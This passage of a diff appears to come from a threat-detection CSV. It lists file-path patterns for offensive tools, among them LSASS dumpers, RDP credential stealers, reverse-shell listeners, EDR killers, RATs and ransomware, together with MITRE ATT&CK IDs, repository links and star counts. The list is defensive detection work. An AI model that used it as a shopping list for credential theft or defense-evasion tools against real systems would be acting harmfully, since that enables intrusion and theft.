TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*\ppl_dump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*\PPLBlade-main*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"*\PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*\PPLKiller*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\PPLKiller*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\PrintSpoofer.cs*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*\PrintSpoofer-1.0.zip*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*\PrintSpoofer-1.0.zip*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*\PrivEditor\*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*\PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*\PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*\PrivKit\*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*\process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*\procdump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\process_killer.cpp*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*\ProduKey.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\ProgramData\asrephashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\ProgramData\shares.txt*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\ProgramData\shares.txt*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\ps2exe.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\PS2EXE\*.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*\PsExecLog.log*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" -"*\PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*\PSPY.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\PSPY.dll*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\PSPY.exe*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\PSRansom -*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" "*\Public\dcapi.dll*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*\public\klogging.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*\Public\Music\RDPCreds.txt*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*\pwn.exe*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\pywsus.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*\Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*\Quasar-master*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*\Ransomware.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*\Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*\Quasar-master*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*\Ransomware.exe","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*\rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*\rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*\ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*\ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*\rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*\rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\RDPCredsStealerDLL*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" -"*\Reaper\Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*\Reaper-main\*.sys*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*\REC2-main.zip*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*\Recon.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\RecycledGate.c*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" -"*\RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*\RedPersist.pdb*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*\RedPersist.sln*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*\RedPersist-main\*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*\RemoteCamera.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*\Resources\Disks-NoEncryption.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\Reaper\Reaper.cpp*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\Reaper-main\*.sys*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\REC2-main.zip*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*\Recon.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\RecycledGate.c*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","0","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*\RedPersist.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\RedPersist.pdb*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\RedPersist.sln*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\RedPersist-main\*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*\reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\RemoteCamera.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*\Resources\Disks-NoEncryption.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" "*\resources\PROCEXP.sys*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" -"*\ROADtools\*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation 